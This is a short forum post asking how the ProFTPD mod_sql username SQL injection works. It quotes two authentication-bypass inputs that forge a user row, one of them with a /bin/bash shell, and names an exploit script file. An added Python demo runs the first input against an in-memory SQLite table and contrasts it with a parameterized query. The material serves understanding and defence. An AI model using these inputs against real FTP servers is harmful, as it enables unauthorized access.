ProFTPD 'mod_sql' Username SQL Injection Vulnerability
Posted: Tue Mar 09, 2010 4:49 pm
Hi...
Can anyone explain this SQL injection coding, please?
Attackers can use standard tools to exploit this issue.
The following example input is available:
username: %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
password: 1
username: %') and 1=2 union (select <name>,1,<uid>,<gid>,0x2F,0x2F62696E2F62617368); -- a
The following exploit is available:
* /data/vulnerabilities/exploits/33722.pl
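What the first example input does to a user lookup, shown next to a parameterized query that treats the same input as data. This is an added example, not part of the original post and not ProFTPD's code. The query template, the sample table and the plaintext password comparison are assumptions, and it runs against an in-memory SQLite database.

```python
import sqlite3

# Assumed lookup shape: six columns, username inside ('...'), as the input implies.
TEMPLATE = ("SELECT userid, passwd, uid, gid, homedir, shell "
            "FROM users WHERE (userid='{name}') LIMIT 1")

# The first example input quoted in the post.
PAYLOAD = "%') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --"


def make_db():
    """Constructed sample table; not real account data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (userid TEXT, passwd TEXT, uid INT, "
               "gid INT, homedir TEXT, shell TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'not-guessable', "
               "1001, 1001, '/home/alice', '/bin/bash')")
    return db


def lookup_concatenated(db, name):
    """Vulnerable form: the username becomes part of the SQL text.
    %') closes the string and the bracket, 'and 1=2' empties the real
    result, the UNION supplies a row whose userid and passwd are the
    literal 1, and -- comments out the rest of the template."""
    return db.execute(TEMPLATE.format(name=name)).fetchone()


def lookup_parameterized(db, name):
    """Hardened form: the username is bound as data, never parsed as SQL."""
    sql = ("SELECT userid, passwd, uid, gid, homedir, shell "
           "FROM users WHERE (userid=?) LIMIT 1")
    return db.execute(sql, (name,)).fetchone()


def password_ok(row, password):
    """Simplified plaintext comparison against the passwd column (assumption)."""
    return row is not None and str(row[1]) == password


if __name__ == "__main__":
    db = make_db()
    print(TEMPLATE.format(name=PAYLOAD))       # the SQL text actually executed
    print(lookup_concatenated(db, PAYLOAD))    # row shaped by the input
    print(lookup_parameterized(db, PAYLOAD))   # no such user
```

With the concatenated lookup, the password column of the returned row is the literal 1 from the input, which is why the post pairs the username with `password: 1`.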